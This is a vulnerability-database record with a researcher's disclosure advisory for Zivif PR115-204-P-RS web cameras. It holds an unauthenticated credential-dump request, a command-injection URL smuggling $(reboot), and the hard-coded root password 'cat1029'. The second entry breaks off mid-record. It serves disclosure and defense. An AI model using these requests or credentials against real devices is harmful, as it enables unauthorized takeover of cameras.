Search criteria
3 vulnerabilities found for pr115-204-p-rs by zivif
VAR-201712-0830
Vulnerability from variot - Updated: 2023-12-18 12:37Zivif PR115-204-P-RS V2.3.4.2103 web cameras contain a hard-coded cat1029 password for the root user. The SONIX operating system's setup renders this password unchangeable and it can be used to access the device via a TELNET session. Zivif Web The camera contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote
Authentication: None
Researcher: Silas Cutler p1nk silas.cutler@blacklistthisdomain.com
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103
Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email
-[Overview]- Implementation of access controls is Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks.
This was first identified with the following request (CVE-2017-17106) http:///web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with:
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester.
In exploring, unauthenticated remote command injection is possible using (CVE-2017-17105) http:///cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)
Command results are not returned, however are executed by the system.
One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
The encrypted password is cat1029.
(none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. \u@\h:\W$ Because of the way the file system is structured, changing this password requires more work then running passwd.
-[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras.
-Silas
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0830",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pr115-204-p-rs",
"scope": "eq",
"trust": 3.0,
"vendor": "zivif",
"version": "2.3.4.2103"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:2.3.4.2103:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zivif:pr115-204-p-rs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17107"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Silas Cutler",
"sources": [
{
"db": "PACKETSTORM",
"id": "145386"
}
],
"trust": 0.1
},
"cve": "CVE-2017-17107",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-17107",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-01358",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-108096",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-17107",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-17107",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-01358",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-145",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-108096",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-17107",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "VULHUB",
"id": "VHN-108096"
},
{
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif PR115-204-P-RS V2.3.4.2103 web cameras contain a hard-coded cat1029 password for the root user. The SONIX operating system\u0027s setup renders this password unchangeable and it can be used to access the device via a TELNET session. Zivif Web The camera contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. \nAs a result, CGI functions can be called directly, bypassing\nauthentication checks. \n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nIn exploring, unauthenticated remote command injection is possible using\n(CVE-2017-17105)\nhttp://\u003cCamera\nIP\u003e/cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot)\n\nCommand results are not returned, however are executed by the system. \n\nOne last findings was the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work then running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring. The\nmotd saying /Welcome to SONIX/ has lead me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "VULHUB",
"id": "VHN-108096"
},
{
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"db": "PACKETSTORM",
"id": "145386"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "145386",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2017-17107",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-145",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-01358",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-108096",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-17107",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "VULHUB",
"id": "VHN-108096"
},
{
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"id": "VAR-201712-0830",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "VULHUB",
"id": "VHN-108096"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
}
]
},
"last_update_date": "2023-12-18T12:37:03.740000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://zivif.com/"
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/exp101tsarchiv30thers "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108096"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "NVD",
"id": "CVE-2017-17107"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
},
{
"trust": 2.6,
"url": "https://twitter.com/silascutler/status/938052460328968192"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2017/dec/42"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17107"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://\u003ccamera"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "VULHUB",
"id": "VHN-108096"
},
{
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"db": "VULHUB",
"id": "VHN-108096"
},
{
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-108096"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"date": "2017-12-13T16:50:24",
"db": "PACKETSTORM",
"id": "145386"
},
{
"date": "2017-12-19T02:29:41.643000",
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"date": "2017-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01358"
},
{
"date": "2018-01-12T00:00:00",
"db": "VULHUB",
"id": "VHN-108096"
},
{
"date": "2018-01-12T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17107"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011812"
},
{
"date": "2018-01-12T15:36:14.907000",
"db": "NVD",
"id": "CVE-2017-17107"
},
{
"date": "2017-12-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif Web Vulnerabilities related to the use of hard-coded credentials in cameras",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011812"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-145"
}
],
"trust": 0.6
}
}
VAR-201712-0829
Vulnerability from variot - Updated: 2023-12-18 12:37Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages. Zivif Web The camera contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote
Authentication: None
Researcher: Silas Cutler p1nk silas.cutler@blacklistthisdomain.com
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103
Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email
-[Overview]- Implementation of access controls is Zivif cameras is severely lacking.
This was first identified with the following request (CVE-2017-17106) http:///web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with:
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester.
In exploring, unauthenticated remote command injection is possible using (CVE-2017-17105) http:///cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)
Command results are not returned, however are executed by the system.
One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
The encrypted password is cat1029.
(none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. \u@\h:\W$ Because of the way the file system is structured, changing this password requires more work then running passwd.
-[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras.
-Silas
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0829",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pr115-204-p-rs",
"scope": "eq",
"trust": 3.0,
"vendor": "zivif",
"version": "2.3.4.2103"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:2.3.4.2103:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zivif:pr115-204-p-rs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17106"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Silas Cutler",
"sources": [
{
"db": "PACKETSTORM",
"id": "145386"
}
],
"trust": 0.1
},
"cve": "CVE-2017-17106",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-17106",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
